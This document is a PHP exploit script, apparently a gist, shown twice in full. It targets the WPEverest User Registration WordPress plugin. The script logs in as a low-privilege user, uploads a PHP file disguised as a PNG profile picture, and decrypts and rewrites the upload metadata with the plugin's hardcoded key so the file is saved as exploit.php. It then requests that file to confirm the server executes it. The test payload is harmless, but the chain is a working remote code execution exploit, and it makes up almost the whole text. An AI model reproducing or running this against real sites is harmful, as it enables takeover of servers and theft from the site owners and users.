lana-codes/wpeverest_user_registration_upload_php_file_exploit.php Secret

## wpeverest_user_registration_upload_php_file_exploit.php
<?php
if ( php_sapi_name() !== 'cli' ) {
	die( sprintf( '%s can only be run from command line', basename( __FILE__ ) ) );
}

function crypt_the_string( $string, $action = 'e' ) {
	$secret_key = 'ur_secret_key';
	$secret_iv  = 'ur_secret_iv';

	$output         = false;
	$encrypt_method = 'AES-256-CBC';
	$key            = hash( 'sha256', $secret_key );
	$iv             = substr( hash( 'sha256', $secret_iv ), 0, 16 );

	if ( 'e' == $action ) {
		if ( function_exists( 'openssl_encrypt' ) ) {
			$output = base64_encode( openssl_encrypt( $string, $encrypt_method, $key, 0, $iv ) );
		} else {
			$output = base64_encode( $string );
		}
	} elseif ( 'd' == $action ) {
		if ( function_exists( 'openssl_decrypt' ) ) {
			$output = openssl_decrypt( base64_decode( $string ), $encrypt_method, $key, 0, $iv );
		} else {
			$output = base64_decode( $string );
		}
	}

	return $output;
}

$options     = getopt( 'hw:u:p:', array( 'website_url:', 'username:', 'password:' ) );
$website_url = 'https://lana.solutions/vdb/wpeverest-user-registration/';
$username    = 'demo';
$password    = 'demo';

$cli_parameters = array(
	'w' => '<website_url>',
	'u' => '<username>',
	'p' => '<password>',
);

$cli_usage = sprintf( 'Usage: php %s %s', basename( __FILE__ ), implode( ' ', array_map( function ( $name, $value ) {
	return sprintf( '-%s %s', $name, $value );
}, array_keys( $cli_parameters ), array_values( $cli_parameters ) ) ) );

foreach ( $options as $opt => $arg ) {
	switch ( $opt ) {
		case 'h':
			echo $cli_usage . PHP_EOL;
			exit();
		case 'w':
		case 'website_url':
			$website_url = $arg;
			break;
		case 'u':
		case 'username':
			$username = $arg;
			break;
		case 'p':
		case 'password':
			$password = $arg;
			break;
	}
}

/** check website url */
if ( ! $website_url ) {
	die( 'Please provide the WordPress website URL!' . PHP_EOL . $cli_usage . PHP_EOL );
}

/** check website url is valid */
if ( ! filter_var( $website_url, FILTER_VALIDATE_URL ) ) {
	die( 'Invalid WordPress website URL:' . $website_url . PHP_EOL );
}

$cookiejar = __DIR__ . '/cookies.txt';

/** format url */
$website_url = rtrim( $website_url, '/' );

/** login request */
$curl = curl_init();
curl_setopt_array( $curl, array(
	CURLOPT_URL            => $website_url . '/wp-login.php',
	CURLOPT_RETURNTRANSFER => true,
	CURLOPT_FOLLOWLOCATION => false,
	CURLOPT_POST           => true,
	CURLOPT_POSTFIELDS     => http_build_query( array(
		'log' => $username,
		'pwd' => $password,
	) ),
	CURLOPT_HTTPHEADER     => array(
		'Content-Type application/x-www-form-urlencoded',
	),
	CURLOPT_COOKIEJAR      => $cookiejar,
	CURLOPT_COOKIEFILE     => $cookiejar,
) );
curl_exec( $curl );
curl_close( $curl );

/** get nonce value from js */
$curl = curl_init();
curl_setopt_array( $curl, array(
	CURLOPT_URL            => $website_url . '/my-account/edit-profile/',
	CURLOPT_RETURNTRANSFER => true,
	CURLOPT_FOLLOWLOCATION => true,
	CURLOPT_CUSTOMREQUEST  => 'GET',
	CURLOPT_COOKIEJAR      => $cookiejar,
	CURLOPT_COOKIEFILE     => $cookiejar,
) );
$response = curl_exec( $curl );
curl_close( $curl );

if ( preg_match( '/"user_registration_profile_picture_upload_nonce":"(.*?)"/', $response, $matches ) ) {
	$user_registration_profile_picture_upload_nonce = $matches[1];
} else {
	die( 'The upload ajax nonce is not found on the WordPress website.' . PHP_EOL );
}

if ( preg_match( '/<input[^>]*id="_wpnonce"[^>]*value="([^"]+)"/', $response, $matches ) ) {
	$save_profile_details_nonce = $matches[1];
} else {
	die( 'The save form nonce is not found on the WordPress website.' . PHP_EOL );
}

/** generate exploit temp file */
$exploit_file_content = <<<PHP
<?php
echo 'md5("exploit"): ' . md5( 'exploit' );
PHP;

$temp_filename = tempnam( sys_get_temp_dir(), 'exploit' );
file_put_contents( $temp_filename, $exploit_file_content );

/** upload exploit file as profile picture */
$curl = curl_init();
curl_setopt_array( $curl, array(
	CURLOPT_URL            => $website_url . '/wp-admin/admin-ajax.php' . '?' . http_build_query( array(
			'action'   => 'user_registration_profile_pic_upload',
			'security' => $user_registration_profile_picture_upload_nonce,
		) ),
	CURLOPT_RETURNTRANSFER => true,
	CURLOPT_POST           => true,
	CURLOPT_POSTFIELDS     => array(
		'file' => new CURLFile( $temp_filename, 'image/png', 'exploit.png' ),
	),
	CURLOPT_COOKIEJAR      => $cookiejar,
	CURLOPT_COOKIEFILE     => $cookiejar,
) );
$response = curl_exec( $curl );
curl_close( $curl );

$response_json = json_decode( $response, true );

$upload_files = array();

if ( $response_json['success'] ) {
	$upload_files = unserialize( crypt_the_string( $response_json['data']['upload_files'], 'd' ) );
} else {
	/** get error message */
	die( $response_json['data']['message'] . PHP_EOL );
}

/** change file name */
$upload_files['file_name'] = 'exploit.php';

/** save profile (with rename exploit file to php) */
$curl = curl_init();
curl_setopt_array( $curl, array(
	CURLOPT_URL            => $website_url . '/my-account/edit-profile/',
	CURLOPT_RETURNTRANSFER => true,
	CURLOPT_FOLLOWLOCATION => false,
	CURLOPT_POST           => true,
	CURLOPT_POSTFIELDS     => http_build_query( array(
		'action'                       => 'save_profile_details',
		'_wpnonce'                     => $save_profile_details_nonce,
		'user_registration_user_login' => $username,
		'profile_pic_url'              => crypt_the_string( serialize( $upload_files ), 'e' ),
	) ),
	CURLOPT_HTTPHEADER     => array(
		'Content-Type application/x-www-form-urlencoded',
	),
	CURLOPT_COOKIEJAR      => $cookiejar,
	CURLOPT_COOKIEFILE     => $cookiejar,
) );
$response = curl_exec( $curl );
curl_close( $curl );

/** test uploaded file */
$curl = curl_init();
curl_setopt_array( $curl, array(
	CURLOPT_URL            => $website_url . '/wp-content/uploads/user_registration_uploads/profile-pictures/exploit.php',
	CURLOPT_RETURNTRANSFER => true,
) );

$response = curl_exec( $curl );
curl_close( $curl );

if ( false !== strpos( $response, '708697c63f7eb369319c6523380bdf7a' ) ) {
	echo 'The file exists and contains the exploit.';
}
	<?php
	if ( php_sapi_name() !== 'cli' ) {
	die( sprintf( '%s can only be run from command line', basename( __FILE__ ) ) );
	}

	function crypt_the_string( $string, $action = 'e' ) {
	$secret_key = 'ur_secret_key';
	$secret_iv = 'ur_secret_iv';

	$output = false;
	$encrypt_method = 'AES-256-CBC';
	$key = hash( 'sha256', $secret_key );
	$iv = substr( hash( 'sha256', $secret_iv ), 0, 16 );

	if ( 'e' == $action ) {
	if ( function_exists( 'openssl_encrypt' ) ) {
	$output = base64_encode( openssl_encrypt( $string, $encrypt_method, $key, 0, $iv ) );
	} else {
	$output = base64_encode( $string );
	}
	} elseif ( 'd' == $action ) {
	if ( function_exists( 'openssl_decrypt' ) ) {
	$output = openssl_decrypt( base64_decode( $string ), $encrypt_method, $key, 0, $iv );
	} else {
	$output = base64_decode( $string );
	}
	}

	return $output;
	}

	$options = getopt( 'hw:u:p:', array( 'website_url:', 'username:', 'password:' ) );
	$website_url = 'https://lana.solutions/vdb/wpeverest-user-registration/';
	$username = 'demo';
	$password = 'demo';

	$cli_parameters = array(
	'w' => '<website_url>',
	'u' => '<username>',
	'p' => '<password>',
	);

	$cli_usage = sprintf( 'Usage: php %s %s', basename( __FILE__ ), implode( ' ', array_map( function ( $name, $value ) {
	return sprintf( '-%s %s', $name, $value );
	}, array_keys( $cli_parameters ), array_values( $cli_parameters ) ) ) );

	foreach ( $options as $opt => $arg ) {
	switch ( $opt ) {
	case 'h':
	echo $cli_usage . PHP_EOL;
	exit();
	case 'w':
	case 'website_url':
	$website_url = $arg;
	break;
	case 'u':
	case 'username':
	$username = $arg;
	break;
	case 'p':
	case 'password':
	$password = $arg;
	break;
	}
	}

	/** check website url */
	if ( ! $website_url ) {
	die( 'Please provide the WordPress website URL!' . PHP_EOL . $cli_usage . PHP_EOL );
	}

	/** check website url is valid */
	if ( ! filter_var( $website_url, FILTER_VALIDATE_URL ) ) {
	die( 'Invalid WordPress website URL:' . $website_url . PHP_EOL );
	}

	$cookiejar = __DIR__ . '/cookies.txt';

	/** format url */
	$website_url = rtrim( $website_url, '/' );

	/** login request */
	$curl = curl_init();
	curl_setopt_array( $curl, array(
	CURLOPT_URL => $website_url . '/wp-login.php',
	CURLOPT_RETURNTRANSFER => true,
	CURLOPT_FOLLOWLOCATION => false,
	CURLOPT_POST => true,
	CURLOPT_POSTFIELDS => http_build_query( array(
	'log' => $username,
	'pwd' => $password,
	) ),
	CURLOPT_HTTPHEADER => array(
	'Content-Type application/x-www-form-urlencoded',
	),
	CURLOPT_COOKIEJAR => $cookiejar,
	CURLOPT_COOKIEFILE => $cookiejar,
	) );
	curl_exec( $curl );
	curl_close( $curl );

	/** get nonce value from js */
	$curl = curl_init();
	curl_setopt_array( $curl, array(
	CURLOPT_URL => $website_url . '/my-account/edit-profile/',
	CURLOPT_RETURNTRANSFER => true,
	CURLOPT_FOLLOWLOCATION => true,
	CURLOPT_CUSTOMREQUEST => 'GET',
	CURLOPT_COOKIEJAR => $cookiejar,
	CURLOPT_COOKIEFILE => $cookiejar,
	) );
	$response = curl_exec( $curl );
	curl_close( $curl );

	if ( preg_match( '/"user_registration_profile_picture_upload_nonce":"(.*?)"/', $response, $matches ) ) {
	$user_registration_profile_picture_upload_nonce = $matches[1];
	} else {
	die( 'The upload ajax nonce is not found on the WordPress website.' . PHP_EOL );
	}

	if ( preg_match( '/<input[^>]id="_wpnonce"[^>]value="([^"]+)"/', $response, $matches ) ) {
	$save_profile_details_nonce = $matches[1];
	} else {
	die( 'The save form nonce is not found on the WordPress website.' . PHP_EOL );
	}

	/** generate exploit temp file */
	$exploit_file_content = <<<PHP
	<?php
	echo 'md5("exploit"): ' . md5( 'exploit' );
	PHP;

	$temp_filename = tempnam( sys_get_temp_dir(), 'exploit' );
	file_put_contents( $temp_filename, $exploit_file_content );

	/** upload exploit file as profile picture */
	$curl = curl_init();
	curl_setopt_array( $curl, array(
	CURLOPT_URL => $website_url . '/wp-admin/admin-ajax.php' . '?' . http_build_query( array(
	'action' => 'user_registration_profile_pic_upload',
	'security' => $user_registration_profile_picture_upload_nonce,
	) ),
	CURLOPT_RETURNTRANSFER => true,
	CURLOPT_POST => true,
	CURLOPT_POSTFIELDS => array(
	'file' => new CURLFile( $temp_filename, 'image/png', 'exploit.png' ),
	),
	CURLOPT_COOKIEJAR => $cookiejar,
	CURLOPT_COOKIEFILE => $cookiejar,
	) );
	$response = curl_exec( $curl );
	curl_close( $curl );

	$response_json = json_decode( $response, true );

	$upload_files = array();

	if ( $response_json['success'] ) {
	$upload_files = unserialize( crypt_the_string( $response_json['data']['upload_files'], 'd' ) );
	} else {
	/** get error message */
	die( $response_json['data']['message'] . PHP_EOL );
	}

	/** change file name */
	$upload_files['file_name'] = 'exploit.php';

	/** save profile (with rename exploit file to php) */
	$curl = curl_init();
	curl_setopt_array( $curl, array(
	CURLOPT_URL => $website_url . '/my-account/edit-profile/',
	CURLOPT_RETURNTRANSFER => true,
	CURLOPT_FOLLOWLOCATION => false,
	CURLOPT_POST => true,
	CURLOPT_POSTFIELDS => http_build_query( array(
	'action' => 'save_profile_details',
	'_wpnonce' => $save_profile_details_nonce,
	'user_registration_user_login' => $username,
	'profile_pic_url' => crypt_the_string( serialize( $upload_files ), 'e' ),
	) ),
	CURLOPT_HTTPHEADER => array(
	'Content-Type application/x-www-form-urlencoded',
	),
	CURLOPT_COOKIEJAR => $cookiejar,
	CURLOPT_COOKIEFILE => $cookiejar,
	) );
	$response = curl_exec( $curl );
	curl_close( $curl );

	/** test uploaded file */
	$curl = curl_init();
	curl_setopt_array( $curl, array(
	CURLOPT_URL => $website_url . '/wp-content/uploads/user_registration_uploads/profile-pictures/exploit.php',
	CURLOPT_RETURNTRANSFER => true,
	) );

	$response = curl_exec( $curl );
	curl_close( $curl );

	if ( false !== strpos( $response, '708697c63f7eb369319c6523380bdf7a' ) ) {
	echo 'The file exists and contains the exploit.';
	}